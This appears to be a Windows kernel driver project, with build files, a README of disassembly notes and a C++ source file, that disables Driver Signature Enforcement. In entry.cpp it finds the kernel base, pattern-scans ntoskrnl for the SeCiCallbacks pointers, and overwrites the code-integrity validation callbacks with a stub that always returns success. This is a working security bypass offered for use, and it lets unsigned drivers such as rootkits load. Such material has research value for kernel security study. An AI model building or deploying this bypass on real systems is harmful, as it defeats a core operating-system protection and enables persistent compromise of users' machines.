├── DisableDSE
    ├── DisableDSE.vcxproj.user
    ├── DisableDSE.vcxproj.filters
    ├── entry.cpp
    └── DisableDSE.vcxproj
├── DisableDSE.sln
└── README.md


/DisableDSE/DisableDSE.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
4 |     <SignMode>Off</SignMode>
5 |   </PropertyGroup>
6 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
7 |     <SignMode>Off</SignMode>
8 |   </PropertyGroup>
9 | </Project>


--------------------------------------------------------------------------------
/DisableDSE/DisableDSE.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |     <Filter Include="Driver Files">
17 |       <UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
18 |       <Extensions>inf;inv;inx;mof;mc;</Extensions>
19 |     </Filter>
20 |   </ItemGroup>
21 |   <ItemGroup>
22 |     <ClCompile Include="entry.cpp">
23 |       <Filter>Source Files</Filter>
24 |     </ClCompile>
25 |   </ItemGroup>
26 | </Project>


--------------------------------------------------------------------------------
/DisableDSE.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.34407.143
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DisableDSE", "DisableDSE\DisableDSE.vcxproj", "{FD8238C9-CBB7-42D4-8045-FF44745413DE}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.ActiveCfg = Debug|x64
15 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.Build.0 = Debug|x64
16 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.Deploy.0 = Debug|x64
17 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.ActiveCfg = Release|x64
18 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.Build.0 = Release|x64
19 | 		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.Deploy.0 = Release|x64
20 | 	EndGlobalSection
21 | 	GlobalSection(SolutionProperties) = preSolution
22 | 		HideSolutionNode = FALSE
23 | 	EndGlobalSection
24 | 	GlobalSection(ExtensibilityGlobals) = postSolution
25 | 		SolutionGuid = {0C93C634-99DE-4F64-8657-28E4C62E8A14}
26 | 	EndGlobalSection
27 | EndGlobal
28 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # DisableDSE
 3 | 
 4 | ### DSE Call Stack
 5 | ```cpp
 6 | nt!SeValidateImageHeader
 7 | nt!MiValidateSectionCreate+0x436
 8 | nt!MiValidateSectionSigningPolicy+0xa6
 9 | nt!MiCreateNewSection+0x5ad
10 | nt!MiCreateImageOrDataSection+0x2d0
11 | nt!MiCreateSection+0xf4
12 | nt!MiCreateSystemSection+0xa0
13 | nt!MiCreateSectionForDriver+0x125
14 | nt!MiObtainSectionForDriver+0xa6
15 | nt!MmLoadSystemImageEx+0xd7
16 | nt!MmLoadSystemImage+0x26
17 | nt!IopLoadDriver+0x224
18 | nt!IopLoadUnloadDriver+0x4e
19 | nt!ExpWorkerThread+0x105
20 | nt!PspSystemThreadStartup+0x55
21 | nt!KiStartSystemThread+0x2a
22 | ```
23 | 
24 | ### SeValidateImageHeader and SeValidateImageData
25 | 
26 | ```assembly
27 | nt!SeValidateImageHeader:
28 | fffff805`3b882f20 488bc4          mov     rax,rsp
29 | fffff805`3b882f23 48895808        mov     qword ptr [rax+8],rbx
30 | fffff805`3b882f27 48897010        mov     qword ptr [rax+10h],rsi
31 | fffff805`3b882f2b 57              push    rdi
32 | fffff805`3b882f2c 4881eca0000000  sub     rsp,0A0h
33 | fffff805`3b882f33 33f6            xor     esi,esi
34 | fffff805`3b882f35 488bda          mov     rbx,rdx
35 | fffff805`3b882f38 4839354155dbff  cmp     qword ptr [nt!SeCiCallbacks+0x20 (ffff805`3b638480)],rsi
36 | fffff805`3b882f3f 488bf9          mov     rdi,rcx
37 | fffff805`3b882f42 488970f0        mov     qword ptr [rax-10h],rsi
38 | fffff805`3b882f46 448bde          mov     r11d,esi
39 | fffff805`3b882f49 0f8451301500    je      nt!SeValidateImageHeader+0x153080 (fffff805`3b9d5fa0)
40 | fffff805`3b882f4f 8b9424f0000000  mov     edx,dword ptr [rsp+0F0h]
41 | fffff805`3b882f56 f6c201          test    dl,1
42 | fffff805`3b882f59 0f85c1000000    jne     nt!SeValidateImageHeader+0x100 (fffff805`3b883020)
43 | ...
44 | 
45 | nt!SeValidateImageData:
46 | fffff805`3b8833a0 4883ec48        sub     rsp,48h
47 | fffff805`3b8833a4 488b05dd50dbff  mov     rax,qword ptr [nt!SeCiCallbacks+0x28 (fffff805`3b638488)]
48 | fffff805`3b8833ab 4c8bd1          mov     r10,rcx
49 | fffff805`3b8833ae 4885c0          test    rax,rax
50 | fffff805`3b8833b1 741f            je      nt!SeValidateImageData+0x32 (fffff805`3b8833d2)
51 | fffff805`3b8833b3 488b4c2478      mov     rcx,qword ptr [rsp+78h]
52 | fffff805`3b8833b8 48894c2428      mov     qword ptr [rsp+28h],rcx
53 | fffff805`3b8833bd 8b4c2470        mov     ecx,dword ptr [rsp+70h]
54 | fffff805`3b8833c1 894c2420        mov     dword ptr [rsp+20h],ecx
55 | fffff805`3b8833c5 498bca          mov     rcx,r10
56 | fffff805`3b8833c8 e86369b4ff      call    nt!guard_dispatch_icall (fffff805`3b3c9d30)
57 | fffff805`3b8833cd 4883c448        add     rsp,48h
58 | fffff805`3b8833d1 c3              ret
59 | ```
60 | 
61 | nt!SeCiCallbacks+0x20 -> Address of CiValidateImageHeader
62 | 
63 | nt!SeCiCallbacks+0x28 -> Address of CiValidateImageData 
64 | 


--------------------------------------------------------------------------------
/DisableDSE/entry.cpp:
--------------------------------------------------------------------------------
 1 | #include <ntifs.h>
 2 | 
 3 | #define InRange(x, a, b) (x >= a && x <= b) 
 4 | #define GetBits(x) (InRange(x, '0', '9') ? (x - '0') : ((x - 'A') + 0xA))
 5 | #define GetByte(x) ((UCHAR)(GetBits(x[0]) << 4 | GetBits(x[1])))
 6 | 
 7 | 
 8 | ULONG64 FindPattern(PVOID Base, SIZE_T Size, PCHAR Pattern)
 9 | {
10 |     PUCHAR ModuleStart = (PUCHAR)Base;
11 |     PUCHAR ModuleEnd = (PUCHAR)(ModuleStart + Size);
12 | 
13 |     PUCHAR FirstMatch = nullptr;
14 |     const char* CurPatt = Pattern;
15 |     for (; ModuleStart < ModuleEnd; ++ModuleStart)
16 |     {
17 |         bool SkiPUCHAR = (*CurPatt == '\?');
18 |         if (SkiPUCHAR || *ModuleStart == GetByte(CurPatt)) {
19 |             if (!FirstMatch) FirstMatch = ModuleStart;
20 |             SkiPUCHAR ? CurPatt += 2 : CurPatt += 3;
21 |             if (CurPatt[-1] == 0) return (ULONG64)FirstMatch;
22 |         }
23 |         else if (FirstMatch) {
24 |             ModuleStart = FirstMatch;
25 |             FirstMatch = nullptr;
26 |             CurPatt = Pattern;
27 |         }
28 |     }
29 |     return NULL;
30 | }
31 | 
32 | PVOID GetKernelBase()
33 | {
34 |     auto IdtBase = *(ULONG64*)(__readgsqword(0x18) + 0x38);     // x64 kernel mode only
35 |     auto Start = *(ULONG64*)(IdtBase + 4) & 0xFFFFFFFFFFFF0000;
36 |     for (auto Page = (PUCHAR)Start; Page > (PUCHAR)Start - 0xB00000; Page -= 0x1000) {
37 |         for (int i = 0; i < 0xFF9; ++i) {
38 |             if (*(USHORT*)&Page[i] == 0x8D48 && Page[i + 2] == 0x1D && Page[i + 6] == 0xFF) {
39 |                 auto KernelBase = &Page[i] + 7 + *(int*)&Page[i + 3];
40 |                 if (((ULONG64)KernelBase & 0xFFF) == 0)
41 |                     return KernelBase;
42 |             }
43 |         }
44 |     }
45 |     return NULL;
46 | }
47 | 
48 | NTSTATUS DisableDSE()
49 | {
50 |     auto ntoskrnl = GetKernelBase();
51 | 
52 |     // Build 17763~22621
53 |     auto Found = FindPattern(ntoskrnl, 0xB00000, "48 39 35 ? ? ? ? 48 8B F9 48 89 70 F0 44 8B DE");
54 |     if (!Found)
55 |         return STATUS_NOT_FOUND;
56 |     auto pCiValidateImageHeader = Found + *(int*)(Found + 3) + 7;
57 |     auto pCiValidateImageData = pCiValidateImageHeader + 8;
58 | 
59 |     // mov eax, 1  ret
60 |     // To make CiValidateImage* return NT_SUCCESS value
61 |     auto MovRet = FindPattern(ntoskrnl, 0xB00000, "B8 01 00 00 00 C3");
62 |     
63 |     // Overwrite .data pointer
64 |     *(ULONG64*)pCiValidateImageHeader = MovRet;
65 |     *(ULONG64*)pCiValidateImageData = MovRet;
66 | 
67 |     return STATUS_SUCCESS;
68 | }
69 | 
70 | EXTERN_C NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
71 | {
72 | 	UNREFERENCED_PARAMETER(RegistryPath);
73 | 	NTSTATUS status = STATUS_SUCCESS;
74 | 	KdPrint(("[DDSE] DriverEntry\n"));
75 | 
76 | 	DriverObject->DriverUnload = [](PDRIVER_OBJECT DriverObject)->VOID {
77 | 		UNREFERENCED_PARAMETER(DriverObject);
78 | 	};
79 | 
80 |     status = DisableDSE();
81 |     if (!NT_SUCCESS(status)) {
82 |         KdPrint(("[DDSE] Disable DSE failed with status: %X\n", status));
83 |         return status;
84 |     }
85 |     KdPrint(("[DDSE] Disable DSE Success!\n"));
86 |     return status;
87 | }
88 | 


--------------------------------------------------------------------------------
/DisableDSE/DisableDSE.vcxproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup Label="ProjectConfigurations">
 4 |     <ProjectConfiguration Include="Debug|x64">
 5 |       <Configuration>Debug</Configuration>
 6 |       <Platform>x64</Platform>
 7 |     </ProjectConfiguration>
 8 |     <ProjectConfiguration Include="Release|x64">
 9 |       <Configuration>Release</Configuration>
10 |       <Platform>x64</Platform>
11 |     </ProjectConfiguration>
12 |   </ItemGroup>
13 |   <PropertyGroup Label="Globals">
14 |     <ProjectGuid>{FD8238C9-CBB7-42D4-8045-FF44745413DE}</ProjectGuid>
15 |     <TemplateGuid>{dd38f7fc-d7bd-488b-9242-7d8754cde80d}</TemplateGuid>
16 |     <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
17 |     <MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
18 |     <Configuration>Debug</Configuration>
19 |     <Platform Condition="'$(Platform)' == ''">Win32</Platform>
20 |     <RootNamespace>DisableDSE</RootNamespace>
21 |   </PropertyGroup>
22 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
23 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
24 |     <TargetVersion>Windows10</TargetVersion>
25 |     <UseDebugLibraries>true</UseDebugLibraries>
26 |     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
27 |     <ConfigurationType>Driver</ConfigurationType>
28 |     <DriverType>WDM</DriverType>
29 |     <Driver_SpectreMitigation>false</Driver_SpectreMitigation>
30 |   </PropertyGroup>
31 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
32 |     <TargetVersion>Windows10</TargetVersion>
33 |     <UseDebugLibraries>false</UseDebugLibraries>
34 |     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
35 |     <ConfigurationType>Driver</ConfigurationType>
36 |     <DriverType>WDM</DriverType>
37 |     <Driver_SpectreMitigation>false</Driver_SpectreMitigation>
38 |   </PropertyGroup>
39 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
40 |   <ImportGroup Label="ExtensionSettings">
41 |   </ImportGroup>
42 |   <ImportGroup Label="PropertySheets">
43 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
44 |   </ImportGroup>
45 |   <PropertyGroup Label="UserMacros" />
46 |   <PropertyGroup />
47 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
48 |     <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
49 |     <EnableInf2cat>false</EnableInf2cat>
50 |   </PropertyGroup>
51 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
52 |     <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
53 |     <EnableInf2cat>false</EnableInf2cat>
54 |   </PropertyGroup>
55 |   <ItemGroup>
56 |     <FilesToPackage Include="$(TargetPath)" />
57 |   </ItemGroup>
58 |   <ItemGroup>
59 |     <ClCompile Include="entry.cpp" />
60 |   </ItemGroup>
61 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
62 |   <ImportGroup Label="ExtensionTargets">
63 |   </ImportGroup>
64 | </Project>


--------------------------------------------------------------------------------